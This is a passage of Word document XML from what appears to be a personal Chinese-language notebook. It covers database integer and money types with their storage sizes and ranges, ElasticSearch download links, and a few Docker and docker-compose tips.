                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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67DF3DA9" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>自增的大范围整数</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7A4D6750" w14:textId="77777777" w:rsidR="00D4520C" w:rsidRPr="00D4520C" w:rsidRDefault="00D4520C" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4520C">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 9223372036854775807</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="752060E9" w14:textId="77777777" w:rsidR="00D150D5" w:rsidRDefault="00D150D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9A8D01" w14:textId="77777777" w:rsidR="002A73CD" w:rsidRDefault="002A73CD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>货币类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572022DF" w14:textId="77777777" w:rsidR="002A73CD" w:rsidRDefault="002A73CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">money </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型存储带有固定小数精度的货币金额。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E6B81B" w14:textId="77777777" w:rsidR="002A73CD" w:rsidRDefault="002A73CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C81C598" w14:textId="5C319748" w:rsidR="00BE3C0E" w:rsidRDefault="002A73CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>numeric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bigint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的值可以转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> money</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不建议使用浮点数来处理处理货币类型，因为存在舍入错误的可能性。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12528" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1241"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1571"/>
        <w:gridCol w:w="8238"/>
      </w:tblGrid>
      <w:tr w:rsidR="007549B9" w:rsidRPr="007549B9" w14:paraId="3434D4A9" w14:textId="77777777" w:rsidTr="007549B9">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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6A254AC6" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>名字</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33B28332" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>存储容量</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625FD2E7" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>描述</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112ADB89" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007549B9" w:rsidRPr="007549B9" w14:paraId="3C19C953" w14:textId="77777777" w:rsidTr="001D6DE7">
        <w:trPr>
          <w:trHeight w:val="271"/>
        </w:trPr>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69CF3294" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>money</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4CD45A24" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8 </w:t>
            </w:r>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>字节</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0992F305" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>货币金额</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6581B56B" w14:textId="77777777" w:rsidR="007549B9" w:rsidRPr="007549B9" w:rsidRDefault="007549B9" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="480" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-92233720368547758.08 </w:t>
            </w:r>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>到</w:t>
            </w:r>
            <w:r w:rsidRPr="007549B9">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> +92233720368547758.07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="528FA045" w14:textId="7D8AF152" w:rsidR="00E342D7" w:rsidRDefault="00E342D7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01143377" w14:textId="28443F46" w:rsidR="00E342D7" w:rsidRDefault="004D696D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc159779564"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CURD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="4CE6E4F2" w14:textId="77777777" w:rsidR="00E342D7" w:rsidRDefault="00E342D7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FD0BC4" w14:textId="77777777" w:rsidR="004D696D" w:rsidRDefault="004D696D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9A7560" w14:textId="77777777" w:rsidR="004D696D" w:rsidRDefault="004D696D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A94AE23" w14:textId="77777777" w:rsidR="00BE3C0E" w:rsidRDefault="00BE3C0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E72E015" w14:textId="77777777" w:rsidR="00BE3C0E" w:rsidRDefault="00BE3C0E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1246FF11" w14:textId="77777777" w:rsidR="00D150D5" w:rsidRDefault="00D150D5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9916FD" w14:textId="77777777" w:rsidR="003B108A" w:rsidRDefault="003B108A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B96C83" w14:textId="246AFF73" w:rsidR="004775A8" w:rsidRDefault="00FC1D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc159779565"/>
      <w:r>
        <w:t>远程访问</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="6425792F" w14:textId="3240F2E1" w:rsidR="00A23AE1" w:rsidRDefault="00A23AE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B277AF" w14:textId="2310BF67" w:rsidR="00FC1D7E" w:rsidRDefault="008C3732" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>搜一下现有的文章，鹏哥给过我但是我忘了在哪里了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585255C3" w14:textId="77777777" w:rsidR="00FC1D7E" w:rsidRDefault="00FC1D7E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315913C7" w14:textId="19443C32" w:rsidR="00F36D0C" w:rsidRDefault="00F36D0C" w:rsidP="00F36D0C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ElasticSearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED93BC" w14:textId="2B0A9201" w:rsidR="00F36D0C" w:rsidRDefault="00F36F60" w:rsidP="00F36D0C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该数据库简称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5185891E" w14:textId="150442BE" w:rsidR="00861413" w:rsidRDefault="000B5D5C" w:rsidP="00861413">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA2FE0" w14:textId="32121555" w:rsidR="00861413" w:rsidRPr="00F36D0C" w:rsidRDefault="000B5D5C" w:rsidP="00861413">
      <w:r w:rsidRPr="000B5D5C">
        <w:t>https://github.com/elastic/elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B4E09" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7248F1F1" w14:textId="3F99731C" w:rsidR="00865822" w:rsidRDefault="00865822" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Download link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D88CF" w14:textId="214B2D28" w:rsidR="00861413" w:rsidRDefault="00865822" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00865822">
        <w:t>https://www.elastic.co/cn/downloads/elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6495C" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D99384C" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="0A11886A" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="5DAB04F3" w14:textId="77777777" w:rsidR="00861413" w:rsidRPr="00F36D0C" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="04E9D232" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19317B91" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5E3462" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0C4AC0" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="119C759B" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="3A586438" w14:textId="77777777" w:rsidR="00861413" w:rsidRPr="00F36D0C" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="6C0998ED" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473C9B1B" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1740EF" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="462300C4" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="47E1476E" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="287E13D7" w14:textId="77777777" w:rsidR="00861413" w:rsidRPr="00F36D0C" w:rsidRDefault="00861413" w:rsidP="00861413"/>
    <w:p w14:paraId="07CBE086" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="337117BF" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A8D487" w14:textId="77777777" w:rsidR="00861413" w:rsidRDefault="00861413" w:rsidP="00861413">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B49428" w14:textId="77777777" w:rsidR="004775A8" w:rsidRDefault="004775A8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FC2D5D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E336DBC" w14:textId="5064CB27" w:rsidR="004C452C" w:rsidRDefault="00BB7BEB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc159779566"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>+docker-compose</w:t>
      </w:r>
      <w:r>
        <w:t>+k8s</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="45D26BC3" w14:textId="3F53C84A" w:rsidR="00AE0CCC" w:rsidRDefault="00AE0CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A8856F" w14:textId="4C4383B4" w:rsidR="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>trick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A7E773" w14:textId="77777777" w:rsidR="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04"/>
    <w:p w14:paraId="1F1596E1" w14:textId="46FB61D8" w:rsidR="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件指定的路径，如果该目录实际不存在，但是他会自行创建该目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC20ADD" w14:textId="0DC46413" w:rsidR="00817F04" w:rsidRPr="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果只是引用其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不是自己构建如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> build: . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则不需要执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose build </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，因为不需要自己构建镜像，直接运行即可。</w:t>
      </w:r>
    </w:p>
